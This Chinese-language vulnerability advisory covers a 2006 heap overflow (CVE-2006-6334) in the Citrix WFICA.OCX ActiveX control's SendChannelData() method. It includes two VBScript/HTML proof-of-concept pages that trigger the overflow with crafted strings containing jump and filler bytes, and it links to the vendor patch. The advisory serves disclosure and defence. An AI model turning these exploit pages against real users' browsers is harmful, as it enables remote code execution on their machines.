安全研究
安全漏洞
Citrix Presentation Server客户端WFICA.OCX ActiveX组件堆溢出漏洞
发布日期:2006-12-06
更新日期:2006-12-07
受影响系统:
Citrix Presentation Server Client for Windows < 9.230不受影响系统:
Citrix Presentation Server Client for Windows 9.230描述:
BUGTRAQ ID: 21458
CVE(CAN) ID: CVE-2006-6334
Citrix Presentation Server允许用户通过网络远程访问应用程序。
Citrix Presentation Server的WFICA.OCX控件在处理畸形参数时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。
Citrix Presentation Server客户端的ICA Client ActiveX控件组件WFICA.OCX(CLSID 238F6F83-B8B4-11CF-8771-00A024541EE3)中的SendChannelData()方法存在堆溢出漏洞。该函数的原型如下:
SendChannelData(ChannelName As String,
Data As String,
DataSize As Long,
DataType As ICAVCDataType)
如果能够为DataSize参数指定过小的缓冲区长度而对Data参数传送超长字符串的话,就会触发这个溢出,导致执行任意指令。
<*来源:Andrew Christensen (anc@fortconsult.net)
链接:http://secunia.com/advisories/23246/
http://support.citrix.com/article/CTX111827&printable=true
http://marc.theaimsgroup.com/?l=full-disclosure&m=116545528600892&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<head> <title>Citrix ActiveX Caller</title> </head>
<body>
<OBJECT id="Security" width=500 height=500
classid="CLSID:238F6F83-B8B4-11CF-8771-
00A024541EE3">
<SPAN STYLE="color:red">Congrats. You aren't
vulnerable.</SPAN>
</OBJECT>
<script language=vbscript>
spamA = "whatever"
spamB =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA9090EB04" + "70DE3400" +
"CCCCCCCC11111111"
msgbox "attach debugger"
Security.SendChannelData spamA,spamB,1,1
</script>
</body>
</html>
========================================================================
<html>
<head> <title>Citrix ActiveX Caller</title> </head>
<body>
<OBJECT id="Security" width=500 height=500
classid="CLSID:238F6F83-B8B4-11CF-8771-
00A024541EE3">
<SPAN STYLE="color:red">Congrats. You aren't
vulnerable.</SPAN>
</OBJECT>
<script language=vbscript>
spamA =
"PAYLOADPAYLOADPAYLOADPAYLOADPAYLOADPAYLOADPAYLOAD"
spamB = "AAAAAAAA" +
"CCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + "BBBBBBBB" +
"DDDDDDDD11111111" + String(160,"C")
msgbox "attach debugger"
Security.SendChannelData spamA,spamB,1,1
</script>
</body>
</html>
建议:
厂商补丁:
Citrix
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.citrix.com/English/SS/downloads/details.asp?dID=2755&downloadID=162299&pID=186
浏览次数:4449
严重程度:0(网友投票)
绿盟科技给您安全的保障